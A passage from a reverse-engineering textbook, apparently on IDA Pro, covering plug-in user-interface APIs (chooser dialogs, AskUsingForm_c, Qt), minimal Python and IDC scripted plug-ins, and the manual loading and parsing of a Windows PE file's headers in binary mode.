example, the result type is an integer value, so the result is stored into the

res->num field. Had the result type been a string, we would have needed to

The IDA Plug-in Architecture 333

call res->set_string to set the string value of the result. If the user fails to

supply a string argument, the function fails and returns the invalid netnode

index -1 \.

We complete the plug-in with the following functions and PLUGIN structure:

void idaapi term(void) {} //nothing to do on termination

void idaapi run(int arg) {} //nothing to do and no way to activate

plugin_t PLUGIN = {

IDP_INTERFACE_VERSION,

//this plugin loads at IDA startup, does not get listed on the Edit>Plugins menu

//and modifies the database

X PLUGIN_FIX | PLUGIN_HIDE | PLUGIN_MOD, // plugin flags

init, // initialize

term, // terminate. this pointer may be NULL.

run, // invoke plugin

"", // long comment about the plugin

"", // multiline help about the plugin

"", // the preferred short name of the plugin

"" // the preferred hotkey to run the plugin

};

The trick to this plug-in is that it loads on IDA startup (PLUGIN_FIX) and

remains hidden from the user because it is not added to the EditPlugins

menu (PLUGIN_HIDE) X. The plug-in is kept in memory for all databases, and

all of the initialization takes place in the plug-in’s init function. As a result,

the plug-in has nothing to do in its run method.

Once this plug-in is installed, an IDC programmer may access any named

netnode in an IDA database using the netnode’s name, as in the following

example:

auto n, val;

n = CreateNetnode("$ imports"); //no $ idc_array prefix will be added

val = GetArrayElement(AR_STR, n, 0); //get element zero

More information for using the SDK to interact with IDC is contained in

the expr.hpp header file.

Plug-in User Interface Options

This book makes no pretense at being a user interface development guide.

However, there are many occasions in which a plug-in will need to interact

with an IDA user to request or display information. In addition to the API’s

askXXX functions mentioned in Chapter 16, a few more complex functions

are available for user interaction via the IDA API. For more adventurous

plug-in authors, it is worth remembering that plug-ins developed for GUI

versions of IDA also have full access to the user interface functions that are

available in various GUI libraries (Qt or Windows Native). Through the use

of these functions it is possible to use virtually any type of graphical interface

element within your plug-ins.

334 Chapter 17

Beyond the SDK’s askXXX interface functions, things get a little more chal-

lenging when using the SDK to build user interface elements. One of the

reasons for this is that the SDK attempts to provide a generic programming

interface to accomplish the fairly complex task of displaying a GUI element

to a user and accepting the user’s input.

Using the SDK’s Chooser Dialogs

The first two functions that we will discuss are called choose and choose2. Each

of these functions, along with various constants used to control its behavior,

is declared in kernwin.hpp. The purpose of each function is to display a list of

data elements to the user and ask the user to select one or more items from

the list. The choose functions are capable of displaying virtually any type of

data by virtue of the fact that they require you to specify formatting functions

that are called to generate each line of text displayed in the chooser window.

The two functions differ in that choose displays a single-column list, while

choose2 is capable of displaying a multicolumn list. In the following examples

we demonstrate the simplest forms of these functions, which rely on many

default parameters. If you want to explore the full range of capabilities of

choose and choose2, please consult kernwin.hpp.

For displaying a single column of information to a user, the simplest

form of the choose function boils down to the following, once default param-

eters are omitted:

ulong choose(void *obj,

int width,

ulong (idaapi *sizer)(void *obj),

char *(idaapi *getline)(void *obj, ulong n, char *buf),

const char *title);

Here, the obj parameter is a pointer to the block of data to be displayed,

and width is the desired column width to be used in the chooser window. The

sizer parameter is a pointer to a function that is capable of parsing the data

pointed to by obj and returning the number of lines required to display that

data. The getline parameter is a pointer to a function that can generate the

character string representation of a single item selected from obj. Note that

the obj pointer can point to any type of data as long as the sizer function can

parse the data to determine the number of lines required to display the data

and as long as the getline function can locate a specific data item using an

integer index and generate a character string representation of that data

item. The title parameter specifies the title string used in the generated

chooser dialog. The choose function returns the index number (1..n) of the

user-selected item or zero if the dialog was canceled by the user. The code in

Listing 17-2, while not terribly exciting, is extracted from a plug-in that dem-

onstrates the use of the choose function.

The IDA Plug-in Architecture 335

#include <kernwin.hpp>

//The sample data to be displayed

int data[] = {0xdeafbeef, 0xcafebabe, 0xfeedface, 0};

//this example expects obj to point to a zero

//terminated array of non-zero integers.

ulong idaapi idabook_sizer(void *obj) {

int *p = (int*)obj;

int count = 0;

while (*p++) count++;

return count;

}

* obj In this example obj is expected to point to an array of integers

* n indicates which line (1..n) of the display is being formatted.

* if n is zero, the header line is being requested.

* buf is a pointer to the output buffer for the formatted data. IDA will

* call this with a buffer of size MAXSTR (1024).

char * idaapi idabook_getline(void *obj, ulong n, char *buf) {

int *p = (int*)obj;

if (n == 0) { //This is the header case

qstrncpy(buf, "Value", strlen("Value") + 1);

}

else { //This is the data case

qsnprintf(buf, 32, "0x%08.8x", p[n - 1]);

}

return buf;

}

void idaapi run(int arg) {

int choice = choose(data, 16, idabook_sizer, idabook_getline,

"Idabook Choose");

msg("The user's choice was %d\n", choice);

}

Listing 17-2: Example use of the choose function

Activating the plug-in from Listing 17-2 results in the chooser dialog

shown in Figure 17-4.

Figure 17-4: Example of the chooser dialog

336 Chapter 17

The choose2 function offers a multicolumn variation of the chooser dialog.

Again, we look at the simplest version of the function, accepting all possible

default arguments, which boils down to the following:

ulong choose2(void *obj,

int ncol,

const int *widths,

ulong (idaapi *sizer)(void *obj),

void (idaapi *getline)(void *obj, ulong n, char* const *cells),

const char *title);

We can observe a few differences between choose2 and the choose function

we saw earlier. First, the ncol parameter specifies the number of columns to

be displayed, while the widths parameter is an array of integers that specify the

width of each column. The format of the getline function changes somewhat

in choose2. Since the choose2 dialog can contain several columns, the getline

function must provide data for each column within a single line. The exam-

ple code in Listing 17-3 shows the use of choose2 in a demonstration plug-in.

#include <kernwin.hpp>

//The sample data to be displayed

int data[] = {0xdeafbeef, 0xcafebabe, 0xfeedface, 0};

//The width of each column

int widths[] = {16, 16, 16};

//The headers for each column

char *headers[] = {"Decimal", "Hexadecimal", "Octal"};

//The format strings for each column

char *formats[] = {"%d", "0x%x", "0%o"};

//this function expects obj to point to a zero terminated array

//of non-zero integers.

ulong idaapi idabook_sizer(void *obj) {

int *p = (int*)obj;

int count = 0;

while (*p++) count++;

return count;

}

* obj In this function obj is expected to point to an array of integers

* n indicates which line (1..n) of the display is being formatted.

* if n is zero, the header line is being requested.

* cells is a pointer to an array of character pointers. This array

* contains one pointer for each column in the chooser. The output

* for each column should not exceed MAXSTR (1024) characters.*/

void idaapi idabook_getline_2(void *obj, ulong n, char* const *cells) {

int *p = (int*)obj;

if (n == 0) {

for (int i = 0; i < 3; i++) {

qstrncpy(cells[i], headers[i], widths[i]);

}

The IDA Plug-in Architecture 337

else {

for (int i = 0; i < 3; i++) {

qsnprintf(cells[i], widths[i], formats[i], p[n - 1]);

}

void run(int arg) {

int choice = choose2(data, 3, widths, idabook_sizer, idabook_getline_2,

"Idabook Choose2");

msg("The choice was %d\n", choice);

}

Listing 17-3: Example use of the choose2 function

The multicolumn chooser dialog generated using the code from List-

ing 17-3 is shown in Figure 17-5.

Figure 17-5: Example of the choose2 dialog

Far more complex uses of both the choose and the choose2 functions are

possible. Each function is capable of creating either modal2 or nonmodal

dialogs, and each function can generate dialogs that allow for selection of

multiple items. Also, each function accepts several additional parameters

that allow you to be notified when various events take place within the dialog.

When these functions are used to create nonmodal dialogs, the result is a

new tabbed window displayed alongside the tabs of other IDA display windows,

such as the Imports window. In fact, IDA’s Imports window is implemented

using the choose2 interface. For more information on the capabilities of

choose and choose2, please refer to kernwin.hpp.

Creating Customized Forms with the SDK

For creating more complex user interface elements, the SDK provides the

AskUsingForm_c function. The prototype for this function is shown here:

int AskUsingForm_c(const char *form,...);

2. A modal dialog must be closed before the user is allowed to continue interacting with the

dialog’s parent application. File open and save dialogs are common examples of modal dialogs.

Modal dialogs are typically used when an application requires information from a user before

the application can continue execution. On the other hand, nonmodal or modeless dialogs

allow the user to continue interacting with the parent application while the dialog remains open.

338 Chapter 17

The function seems simple enough, yet it is among the more complex

user interface functions available in the SDK. This complexity is due to the

nature of the form argument, which is used to specify the layout of various

user interface elements within the custom dialog. AskUsingForm_c is similar to

printf in that the form argument is essentially a format string that describes

the layout of various input elements. Where printf format strings utilize out-

put format specifiers that are replaced with formatted data, AskUsingForm_c

format strings are composed of both output specifiers and form field specifi-

ers that are replaced with instances of input elements when the form is dis-

played. AskUsingForm_c recognizes a completely different set of output field

specifiers than printf. These specifiers are detailed in kernwin.hpp along with

complete documentation on the use of AskUsingForm_c. The basic format of a

form field specifier is shown here:

<#hint text#label:type:width:swidth:@hlp[]>

The individual components of a form field specifier are described in the

following list:

#hint text# This element is optional. If present, the hint text, excluding

the # characters, is displayed as a tool tip when the mouse hovers over the

associated input field.

label Static text displayed as a label to the left of the associated input

field. In the case of button fields, this is the button text.

type A single character indicates the type of form field being specified.

Form field types are described following this list.

width The maximum number of input characters accepted by the

associated input field. In the case of button fields, this field specifies

an integer button identification code used to distinguish one button

from another.

swidth The display width of the input field.

@hlp[] This field is described in kernwin.hpp as “the number of help

screen from the IDA.HLP file.” Since the content of this file is dictated

by Hex-Rays, it seems unlikely that this field will be of use in the majority

of cases. Substitute a colon for this field in order to ignore it.

The characters used for the type field specify what type of input field will

be generated when the dialog is realized at runtime. Each type of form field

requires an associated parameter in the variable arguments portion of the

AskUsingForm_c parameter list. Form field type specifiers and their associated

parameter type are shown here (as taken from kernwin.hpp):

Input field types va_list parameter

----------------- -----------------

A - ascii string char* at least MAXSTR size

S - segment sel_t*

The IDA Plug-in Architecture 339

N - hex number, C notation uval_t*

n - signed hex number, C notation sval_t*

L - default base (usually hex) number, ulonglong*

C notation

l - default base (usually hex) number, longlong*

signed C notation

M - hex number, no "0x" prefix uval_t*

D - decimal number sval_t*

O - octal number, C notation sval_t*

Y - binary number, "0b" prefix sval_t*

H - char value, C notation sval_t*

$ - address ea_t*

I - ident char* at least MAXNAMELEN size

B - button formcb_t button callback function

K - color button bgcolor_t*

C - checkbox ushort* bit mask of checked boxes

R - radiobutton ushort* number of selected radiobutton

All numeric fields interpret the user-supplied input as an IDC expression

that is parsed and evaluated when the user clicks the dialog’s OK button. All

fields require a pointer argument that is used for both input and output.

When the form is first generated, initial values for all form fields are taken by

dereferencing the associated pointers. Upon return, the user-supplied form

field values are written into the associated memory locations. The pointer

argument associated with a button (B) field is the address of a function that

will be called if the associated button is pressed. The formcb_t function is

defined as follows.

// callback for buttons

typedef void (idaapi *formcb_t)(TView *fields[],int code);

The code argument to the button callback represents the code (width)

value associated with the button that was clicked. By using a switch statement to

test this code, you can use a single function to process many different buttons.

The syntax for specifying radio button and checkbox controls differs

slightly from the format of other types of form fields. These fields utilize the

following format:

<#item hint#label:type>

Radio buttons and checkboxes may be grouped by listing their specifiers

in order and denoting the end of the list using the following special format

(note the extra > at the end).

<#item hint#label:type>>

340 Chapter 17

A radio button (or checkbox) group will be boxed to highlight the group.

You can give the box a title by utilizing a special format when specifying the

first element in the group, as shown here:

<#item hint#title#box hint#label:type>

If you want to have a box title but do not want to use any hints, the hints

may be omitted, leaving the following format specifier:

<##title##label:type>

At this point let’s look at an example of a dialog constructed using

AskUsingForm_c. Figure 17-6 shows a dialog that we will refer to throughout

this discussion.

Figure 17-6: Sample AskUsingForm_c

dialog

Format strings used to create AskUsingForm_c dialogs are made up of indi-

vidual lines that specify each aspect of the desired dialog. In addition to form

field specifiers, the format string may contain static text that is displayed, ver-

batim, in the resulting dialog. Finally, the format string may contain a dialog

title (which must be followed by two carriage returns) and one or more

behavior directives (such as STARTITEM, which specifies the index of the form

field that is initially active when the dialog is first displayed). The format

string used to create the dialog in Figure 17-6 is shown here:

char *dialog =

"STARTITEM 0\n" //The first item gets the input focus

"This is the title\n\n" //followed by 2 new lines

"This is static text\n"

"<String:A:32:32::>\n" //An ASCII input field, need char[MAXSTR]

"<Decimal:D:10:10::>\n" //A decimal input field, sval_t*

"<#No leading 0x#Hex:M:8:10::>\n" //A Hex input field with hint, uval_t*

"<Button:B::::>\n" //A button field with no code, formcb_t

"<##Radio Buttons##Radio 1:R>\n" //A radio button with box title

The IDA Plug-in Architecture 341

"<Radio 2:R>>\n" //Last radio button in group

//ushort* number of selected radio

"<##Check Boxes##Check 1:C>\n" //A checkbox field with a box title

"<Check 2:C>>\n"; //Last checkbox in group

//ushort* bitmask of checks

By formatting the dialog specification as we have, one element per line,

we are attempting to make it easier to map each field specifier to its corre-

sponding field in Figure 17-6. You may notice that in Figure 17-6, all of the

text and numeric input fields appear as drop-down list controls. In an effort

to save you time, IDA populates each list with recently entered values whose

type matches the type of the associated input field. The following plug-in

code may be used to display the example dialog and process any results:

void idaapi button_func(TView *fields[], int code) {

msg("The button was pressed!\n");

}

void idaapi run(int arg) {

char input[MAXSTR];

sval_t dec = 0;

uval_t hex = 0xdeadbeef;

ushort radio = 1; //select button 1 initially

ushort checkmask = 3; //select both checkboxes initially

qstrncpy(input, "initial value", sizeof(input));

if (AskUsingForm_c(dialog, input, &dec, &hex,

button_func, &radio, &checkmask) == 1) {

msg("The input string was: %s\n", input);

msg("Decimal: %d, Hex %x\n", dec, hex);

msg("Radio button %d is selected\n", radio);

for (int n = 0; checkmask; n++) {

if (checkmask & 1) {

msg("Checkbox %d is checked\n", n);

}

checkmask >>= 1;

}

Note that when processing radio button and checkbox results, the first

button in each group is considered button zero.

The AskUsingForm_c function provides a considerable amount of power

for designing user interface elements for your plug-ins. The example here

touches on many of the capabilities of this function, but many more are

detailed in kernwin.hpp. Please refer to this file for more information on the

AskUsingForm_c function and its capabilities.

Windows-Only User Interface–Generation Techniques

Many developers have wrestled with the problem of creating user interfaces

for their plug-ins. Plug-ins targeting the Windows-only GUI version of IDA

(idag.exe) have the entire Windows graphical API at their disposal. The

342 Chapter 17

author of the mIDA3 plug-in from Tenable Security developed an alternate

approach for creating the MDI4 client windows used in the mIDA plug-in.

Alengthy thread

5 on the challenges faced by the mIDA developers can be

found in the IDA support forums. The thread also contains example code

that demonstrates their solution to the problem.

The ida-x86emu6 plug-in takes a slightly different approach in its user

interface. This plug-in relies on the fact that a handle to IDA’s main window

can be obtained using the following SDK code:

HWND mainWindow = (HWND)callui(ui_get_hwnd).vptr;

Using the main IDA window as a parent, ida-x86emu currently makes no

attempt to integrate into the IDA workspace. All of the plug-in’s dialog inter-

faces are generated using a Windows resource editor, and all user interactions

are handled using direct calls to Windows API functions. The use of a graph-

ical dialog editor in conjunction with direct calls to native Windows API func-

tions provides the most powerful user interface–generation capability at the

expense of added complexity and the additional knowledge required to pro-

cess Windows messages and work with lower-level interface functions.

User Interface Generation with Qt

The Qt user interface introduced in IDA 6.0 offers plug-in developers

the chance to create plug-ins with complex user interfaces capable of being

used on all IDA platforms. Hex-Rays’ Daniel Pistelli7 discusses some of the

requirements for using Qt in your plug-ins in a blog post on the Hex-Rays

blog.8 In this section we will reiterate some of the important points that Daniel

makes as well as point out some additional useful information.

If you wish to make use of any Qt functionality in your plug-ins, you must

begin by properly configuring a Qt development environment. IDA 6.1 ships

with its own versions of the Qt 4.7.2 libraries.9 When Hex-Rays builds its Qt

libraries, it wraps the libraries in a C++ namespace named QT. To configure

your development environment, obtain the appropriate Qt sources from

Nokia. The Windows version of idaq is built with Visual Studio 2008,10 and

the Linux and OS X versions use g++. The appropriate sources for Windows

may be found here:

ftp://ftp.qt.nokia.com/qt/source/qt-win-opensource-4.7.2-vs2008.exe

3. See http://cgi.tenablesecurity.com/tenable/mida.php.

4. The Windows Multiple Document Interface (MDI) allows multiple child (client) windows to be

contained within a single container window.

5. See http://www.hex-rays.com/forum/viewtopic.php?f=8&t=1660&p=6752.

6. See http://www.idabook.com/ida-x86emu.

7. Daniel led the Hex-Rays effort to migrate IDA’s GUI to Qt.

8. See http://www.hexblog.com/?p=250.

9. IDA 6.0 utilized Qt 4.6.3.

10. As a consequence, if you are building a Qt-related plug-in on Windows, you must use Visual

Studio to build your plug-in.

The IDA Plug-in Architecture 343

Sources for Linux and OS X can be found here:

ftp://ftp.qt.nokia.com/qt/source/qt-everywhere-opensource-src-4.7.2.tar.gz

See Daniel’s blog post for specific commands to configure your sources.

The key to proper configuration is the following command-line parameter:

-qtnamespace QT

This parameter causes the Qt sources to be wrapped in the QT name-

space. In order to build any Qt-related plug-ins on Windows, you will need

link libraries (.lib files) for each Qt library that you utilize in your plug-in.

While IDA ships with a number of dynamic link libraries for Qt (see <IDADIR>

for a complete list), the SDK ships with a very limited number of Qt link

libraries for Windows (notably QtCore4 and QtGui), which may be found

in <SDKDIR>/lib/x86_win_qt. If you need additional link libraries, you will

need to link against the libraries that you build yourself from the Qt sources.

On Linux and OS X, you can link directly with the Qt libraries that ship with

IDA. On Linux, these can be found in <IDADIR>; on OS X these can be

found in <IDADIR>/idaq.app/Contents/Frameworks. Note that linking against

Qt libraries that don’t ship with IDA will make your plug-in somewhat less

portable, unless you also distribute those libraries along with your plug-in.

When configuring your Qt plug-in projects, make sure that your qmake

project file contains the following configuration directive:

QT_NAMESPACE = QT

IDA defines a number of functions for safer string handling within the

SDK. These include functions such as qstrlen and qsnprintf, which have long

been part of the SDK. With the move to a Qt-based GUI, this leads to prob-

lems because Qt also defines several functions named the same as those pro-

vided by IDA. The IDA functions reside in the global namespace, while the

Qt functions reside in the QT namespace. The IDA versions of such functions

can be called by explicitly referencing the global namespace as shown here:

unsigned int len = ::qstrlen(myString);

Should you need a parent widget for any widgets that you are creating in

your plug-in, the following statement will obtain a pointer to idaq’s top-level

application window:

QWidget *mainWindow = QApplication::activeWindow();

This invokes a static method within Qt’s QApplication class that returns

the widget pointer for the sole QApplication object in any Qt application.

For more information on configuring your plug-ins to use Qt, refer to

Daniel’s blog post. Additionally, the qwindow plug-in sample that ships with

IDA’s SDK provides an example of a plug-in that makes use of Qt. Specifically

344 Chapter 17

it contains example code that creates an empty widget (using create_tform),

uses callbacks to receive notification that the form is being made visible,

obtains a QWidget pointer to the newly created form, and finally populates

the form with a Qt button object. The collabREate and ida-x86emu plug-ins

to be discussed in Chapter 23 also make use of Qt GUI elements to allow

these plug-ins to be used on all IDA capable platforms.

Scripted Plug-ins

IDA 5.6 introduced support for scripted loader modules. In IDA 5.7, support

was added for scripted plug-ins11 and processor modules. While this does

not necessarily allow for the development of more powerful plug-ins, it does

somewhat lower the barrier to entry for potential plug-in developers and

allows for a somewhat faster development cycle because the complex build

process is eliminated.

Although scripted plug-ins can be created using either IDC or Python,

Python is probably the most appropriate choice given that it exposes so

much of IDA’s SDK. Given this fact, there is no reason why Python plug-ins

can’t be just as powerful as compiled C++ plug-ins.

Creating a Python plug-in is a straightforward process. The primary

requirement is to define a function named PLUGIN_ENTRY that returns an

instance of plugin_t (defined in module idaapi). The plugin_t class contains

members that mirror the members of the SDK’s C++ plugin_t class. Listing 17-4

shows a simple Python plug-in that defines a class named idabook_plugin_t,

which inherits from plugin_t; initializes all required members; and defines

init, term, and run functions that implement the plug-in behavior.

from idaapi import *

class idabook_plugin_t(plugin_t):

flags = 0

wanted_name = "IdaBook Python Plugin"

wanted_hotkey = "Alt-8"

comment = "IdaBook Python Plugin"

help = "Something helpful"

def init(self):

msg("IdaBook plugin init called.\n")

return PLUGIN_OK

def term(self):

msg("IdaBook plugin term called.\n")

def run(self, arg):

warning("IdaBook plugin run(%d) called.\n" % arg)

11. See http://www.hexblog.com/?p=120.

The IDA Plug-in Architecture 345

def PLUGIN_ENTRY():

return idabook_plugin_t()

Listing 17-4: A minimal Python plug-in

Installation of the plug-in script is accomplished by copying the script to

<IDADIR>/plugins.

The same plug-in written in IDC appears in Listing 17-5. Since IDC does

not define a plug-in–related base class, our obligation is to create a class that

defines all the elements expected of a plug-in, ensuring that we name each

element properly.

#include <idc.idc>

class idabook_plugin_t {

idabook_plugin_t() {

this.flags = 0;

this.wanted_name = "IdaBook IDC Plugin";

this.wanted_hotkey = "Alt-9";

this.comment = "IdaBook IDC Plugin";

this.help = "Something helpful";

}

init() {

Message("IdaBook plugin init called.\n");

return PLUGIN_OK;

}

term() {

Message("IdaBook plugin term called.\n");

}

run(arg) {

Warning("IdaBook plugin run(%d) called.\n", arg);

}

static PLUGIN_ENTRY() {

return idabook_plugin_t();

}

Listing 17-5: A minimal IDC plug-in

As with the Python example, the PLUGIN_ENTRY function serves to create

and return an instance of our plug-in class. Installation, once again, involves

copying the .idc file to <IDADIR>/plugins.

346 Chapter 17

Summary

IDA plug-ins are the logical next step when scripting fails to meet your needs

for extending IDA’s capabilities, though with the advent of scripted plug-ins,

you may find yourself resisting the urge to dive into the SDK. Additionally,

unless you are faced with the challenge of reverse engineering a file format

that is unknown to IDA or a machine language for which IDA has no proces-

sor module, plug-ins may be the only type of IDA extension that you ever feel

the need to explore. Nonetheless, in the next two chapters, we continue to

explore the capabilities offered by IDA’s SDK by looking at the other types of

modules that can be constructed for use with IDA: loaders and processor

modules.

JMP

EBP

SUB

BINARY FILES AND IDA

LOADER MODULES

One day word will get out that you have

become the resident IDA geek. You may rel-

ish the fact that you have hit the big time, or you

may bemoan the fact that from that day forward, peo-

ple will be interrupting you with questions about what

some file does. Eventually, either as a result of one such question or simply

because you enjoy using IDA to open virtually every file you can find, you

may be confronted with the dialog shown in Figure 18-1.

This is IDA’s standard file-loading dialog with a minor problem (from

the user’s perspective). The short list of recognized file types contains only

one entry, Binary file, indicating that none of IDA’s installed loader modules

recognize the format of the file you want to load. Hopefully you will at least

know what machine language you are dealing with (you do at least know

where the file came from, right?) and can make an intelligent choice for

the processor type, because that is about all you can do in such cases.

348 Chapter 18

Figure 18-1: Loading a binary file

In this chapter we will discuss IDA’s capabilities for helping you make

sense of unrecognized file types, beginning with manual analysis of binary

file formats and then using that as motivation for the development of your

own IDA loader modules.

Unknown File Analysis

An infinite number of file formats exist for storing executable code. IDA

ships with loader modules to recognize many of the more common file for-

mats, but there is no way that IDA can accommodate the ever-increasing

number of formats in existence. Binary images may contain executable files

formatted for use with specific operating systems, ROM images extracted

from embedded systems, firmware images extracted from flash updates, or

simply raw blocks of machine language, perhaps extracted from network

packet captures. The format of these images may be dictated by the operat-

ing system (executable files), the target processor and system architecture

(ROM images), or nothing at all (exploit shellcode embedded in application

layer data).

Assuming that a processor module is available to disassemble the code

contained in the unknown binary, it will be your job to properly arrange the

file image within an IDA database before informing IDA which portions of

the binary represent code and which portions of the binary represent data.

Binary Files and IDA Loader Modules 349

For most processor types, the result of loading a file using the binary format

is simply a list of the contents of the file piled into a single segment begin-

ning at address zero, as shown in Listing 18-1.

seg000:00000000 db 4Dh ; M

seg000:00000001 db 5Ah ; Z

seg000:00000002 db 90h ; É

seg000:00000003 db 0

seg000:00000004 db 3

seg000:00000005 db 0

seg000:00000006 db 0

seg000:00000007 db 0

Listing 18-1: Initial lines of a PE file loaded in binary mode

In some cases, depending on the sophistication of the selected processor

module, some disassembly may take place. This may be the case when a

selected processor is an embedded microcontroller that can make specific

assumptions about the memory layout of ROM images. For those interested

in such applications, Andy Whittaker has created an excellent walk-through1

of reverse engineering a binary image for a Siemens C166 microcontroller

application.

When faced with binary files, you will almost certainly need to arm your-

self with as many resources related to the file as you can get your hands on.

Such resources might include CPU references, operating system references,

system design documentation, and any memory layout information obtained

through debugging or hardware-assisted (such as via logic analyzers) analysis.

In the following section, for the sake of example we assume that IDA

does not recognize the Windows PE file format. PE is a well-known file format

that many readers may be familiar with. More important, documents detail-

ing the structure of PE files are widely available, which makes dissecting an

arbitrary PE file a relatively simple task.

Manually Loading a Windows PE File

When you can find documentation on the format utilized by a particular file,

your life will be significantly easier as you attempt to map the file into an IDA

database. Listing 18-1 shows the first few lines of a PE file loaded into IDA as

a binary file. With no help from IDA, we turn to the PE specification,2 which

states that a valid PE file will begin with a valid MS-DOS header structure. A

valid MS-DOS header structure in turn begins with the 2-byte signature 4Dh

5Ah (MZ), which we see in the first two lines of Listing 18-1.

At this point an understanding of the layout of an MS-DOS header is

required. The PE specification would tell us that the 4-byte value located at

offset 0x3C in the file indicates the offset to the next header we need to find—

the PE header. Two strategies for breaking down the fields of the MS-DOS

1. See http://www.andywhittaker.com/ECU/DisassemblingaBoschME755/tabid/96/Default.aspx.

2. See http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx (EULA acceptance

required).

350 Chapter 18

header are (1) to define appropriately sized data values for each field in the

MS-DOS header or (2) to use IDA’s structure-creation facilities to define and

apply an IMAGE_DOS_HEADER structure in accordance with the PE file specifica-

tion.3 Using the latter approach would yield the following modified display:

seg000:00000000 dw 5A4Dh ; e_magic

seg000:00000000 dw 90h ; e_cblp

seg000:00000000 dw 3 ; e_cp

seg000:00000000 dw 0 ; e_crlc

seg000:00000000 dw 4 ; e_cparhdr

seg000:00000000 dw 0 ; e_minalloc

seg000:00000000 dw 0FFFFh ; e_maxalloc

seg000:00000000 dw 0 ; e_ss

seg000:00000000 dw 0B8h ; e_sp

seg000:00000000 dw 0 ; e_csum

seg000:00000000 dw 0 ; e_ip

seg000:00000000 dw 0 ; e_cs

seg000:00000000 dw 40h ; e_lfarlc

seg000:00000000 dw 0 ; e_ovno

seg000:00000000 dw 4 dup(0) ; e_res

seg000:00000000 dw 0 ; e_oemid

seg000:00000000 dw 0 ; e_oeminfo

seg000:00000000 dw 0Ah dup(0) ; e_res2

seg000:00000000 dd 80h X; e_lfanew

The e_lfanew field X has a value of 80h, indicating that a PE header

should be found at offset 80h (128 bytes) into the database. Examining the

bytes at offset 80h should reveal the magic number for a PE header, 50h 45h

(PE), and allow us to build (based on our reading of the PE specification)

and apply an IMAGE_NT_HEADERS structure at offset 80h into the database. A

portion of the resulting IDA listing might look like the following:

seg000:00000080 dd 4550h ; Signature

seg000:00000080 dw 14Ch Y; FileHeader.Machine

seg000:00000080 dw 4 \; FileHeader.NumberOfSections

seg000:00000080 dd 47826AB4h ; FileHeader.TimeDateStamp

seg000:00000080 dd 0E00h ; FileHeader.PointerToSymbolTable

seg000:00000080 dd 0FBh ; FileHeader.NumberOfSymbols

seg000:00000080 dw 0E0h ; FileHeader.SizeOfOptionalHeader

seg000:00000080 dw 307h ; FileHeader.Characteristics

seg000:00000080 dw 10Bh ; OptionalHeader.Magic

seg000:00000080 db 2 ; OptionalHeader.MajorLinkerVersion

seg000:00000080 db 38h ; OptionalHeader.MinorLinkerVersion

seg000:00000080 dd 600h ; OptionalHeader.SizeOfCode

seg000:00000080 dd 400h ; OptionalHeader.SizeOfInitializedData

seg000:00000080 dd 200h ; OptionalHeader.SizeOfUninitializedData

seg000:00000080 dd 1000h [; OptionalHeader.AddressOfEntryPoint

seg000:00000080 dd 1000h ; OptionalHeader.BaseOfCode

seg000:00000080 dd 0 ; OptionalHeader.BaseOfData

seg000:00000080 dd 400000h Z; OptionalHeader.ImageBase

3. Refer to “Using Standard Structures” on page 151 for a discussion on adding these structure

types in IDA.

Binary Files and IDA Loader Modules 351

seg000:00000080 dd 1000h ^; OptionalHeader.SectionAlignment

seg000:00000080 dd 200h ]; OptionalHeader.FileAlignment

The preceding listings and discussion bear many similarities to the

exploration of MS-DOS and PE header structures conducted in Chapter 8.

In this case, however, the file has been loaded into IDA without the benefit

of the PE loader, and rather than being a curiosity as they were in Chapter 8,

the header structures are essential to a successful understanding of the remain-

der of the database.

At this point, we have revealed a number of interesting pieces of infor-

mation that will help us to further refine our database layout. First, the Machine

Y field in a PE header indicates the target CPU type for which the file was

built. In this example the value 14Ch indicates that the file is for use with x86

processor types. Had the machine type been something else, such as 1C0h

(ARM), we would actually need to close the database and restart our analysis,

making certain that we select the correct processor type in the initial loading

dialog. Once a database has been loaded, it is not possible to change the pro-

cessor type in use with that database.

The ImageBase Z field indicates the base virtual address for the loaded file

image. Using this information, we can finally begin to incorporate some virtual

address information into the database. Using the EditSegmentsRebase

Program menu option, we can specify a new base address for the first seg-

ment of the program, as shown in Figure 18-2.

Figure 18-2: Specifying a new base

address for a program

In the current example, only one segment exists, because IDA creates

only one segment to hold the entire file when a file is loaded in binary mode.

The two checkbox options shown in the dialog determine how IDA handles

relocation entries when segments are moved and whether IDA should move

every segment present in the database, respectively. For a file loaded in binary

mode, IDA will not be aware of any relocation information. Similarly, with

only one segment present in the program, the entire image will be rebased

by default.

The AddressOfEntryPoint [ field specifies the relative virtual address

(RVA) of the program entry point. An RVA is a relative offset from the pro-

gram’s base virtual address, while the program entry point represents the

address of the first instruction within the program that will be executed. In

352 Chapter 18

this case an entry point RVA of 1000h indicates that the program will begin

execution at virtual address 401000h (400000h + 1000h). This is an important

piece of information, because it is our first indication of where we should

begin looking for code within the database. Before we can do that, however,

we need to properly map the remainder of the database to appropriate vir-

tual addresses.

The PE format makes use of sections to describe the mapping of file

content to memory ranges. By parsing the section headers for each section

in the file, we can complete the basic virtual memory layout of the database.

The NumberOfSections \ field indicates the number of sections contained in

a PE file; in this case there are four. Referring once again to the PE specifica-

tion, we would learn that an array of section header structures immediately

follows the IMAGE_NT_HEADERS structure. Individual elements in the array are

IMAGE_SECTION_HEADER structures, which we could define in IDA’s Structures

window and apply (four times in this case) to the bytes following the

IMAGE_NT_HEADERS structure.

Before we discuss segment creation, two additional fields worth pointing

out are FileAlignment ] and SectionAlignment ^. These fields indicate how the

data for each section is aligned4 within the file and how that same data will

be aligned when mapped into memory, respectively. In our example, each

section is aligned to a 200h byte offset within the file; however, when loaded

into memory, those same sections will be aligned on addresses that are multi-

ples of 1000h. The smaller FileAlignment value offers a means of saving space

when an executable image is stored in a file, while the larger SectionAlignment

value typically corresponds to the operating system’s virtual memory page

size. Understanding how sections are aligned can help us avoid errors when

we manually create sections within our database.

After structuring each of the section headers, we finally have enough

information to begin creating additional segments within the database. Apply-

ing an IMAGE_SECTION_HEADER template to the bytes immediately following the

IMAGE_NT_HEADERS structure yields the first section header and results in the fol-

lowing data displayed in our example database:

seg000:00400178 db '.text',0,0,0 X; Name

seg000:00400178 dd 440h ; VirtualSize

seg000:00400178 dd 1000h Z; VirtualAddress

seg000:00400178 dd 600h [; SizeOfRawData

seg000:00400178 dd 400h Y; PointerToRawData

seg000:00400178 dd 0 ; PointerToRelocations

seg000:00400178 dd 0 ; PointerToLinenumbers

seg000:00400178 dw 0 ; NumberOfRelocations

seg000:00400178 dw 0 ; NumberOfLinenumbers

seg000:00400178 dd 60000020h ; Characteristics

4. Alignment describes the starting address or offset of a block of data. The address or offset

must be an even multiple of the alignment value. For example, when data is aligned to a 200h-

